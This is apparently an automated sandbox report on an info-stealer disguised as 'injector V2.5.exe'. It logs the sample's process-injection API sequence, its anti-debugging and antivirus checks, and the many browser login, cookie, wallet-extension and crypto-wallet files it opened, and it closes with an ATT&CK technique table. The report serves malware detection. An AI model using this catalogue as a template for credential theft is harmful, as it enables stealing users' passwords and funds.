          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_005FCD10 mov eax, dword ptr fs:[00000030h]2_2_005FCD10
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00609F90 GetProcessHeap,0_2_00609F90
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00605444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00605444
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00605438 SetUnhandledExceptionFilter,0_2_00605438
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00607DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00607DCA
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00604AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00604AD9
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00604AD9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00604AD9
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00605444 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00605444
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00605438 SetUnhandledExceptionFilter,2_2_00605438
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 2_2_00607DCA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00607DCA

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_0061B18D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0061B18D
          Source: C:\Users\user\Desktop\injector V2.5.exeMemory written: C:\Users\user\Desktop\injector V2.5.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeProcess created: C:\Users\user\Desktop\injector V2.5.exe "C:\Users\user\Desktop\injector V2.5.exe"Jump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_00605200 cpuid 0_2_00605200
          Source: C:\Users\user\Desktop\injector V2.5.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeCode function: 0_2_006058C5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_006058C5
          Source: C:\Users\user\Desktop\injector V2.5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: injector V2.5.exe, 00000002.00000003.1935433049.0000000002D62000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000003.1939442013.0000000002D62000.00000004.00000020.00020000.00000000.sdmp, injector V2.5.exe, 00000002.00000002.1940531601.0000000002D62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\injector V2.5.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: injector V2.5.exe PID: 6276, type: MEMORYSTR
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\MXPXCVPDVNJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
          Source: C:\Users\user\Desktop\injector V2.5.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
          Source: Yara matchFile source: Process Memory Space: injector V2.5.exe PID: 6276, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: injector V2.5.exe PID: 6276, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Windows Management Instrumentation
          1
          DLL Side-Loading
          211
          Process Injection
          11
          Virtualization/Sandbox Evasion
          2
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          21
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          211
          Process Injection
          LSASS Memory1
          Query Registry
          Remote Desktop Protocol31
          Data from Local System
          2
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account Manager141
          Security Software Discovery
          SMB/Windows Admin Shares2
          Clipboard Data
          113
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
          Obfuscated Files or Information
          NTDS11
          Virtualization/Sandbox Evasion
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Software Packing
          LSA Secrets1
          Process Discovery
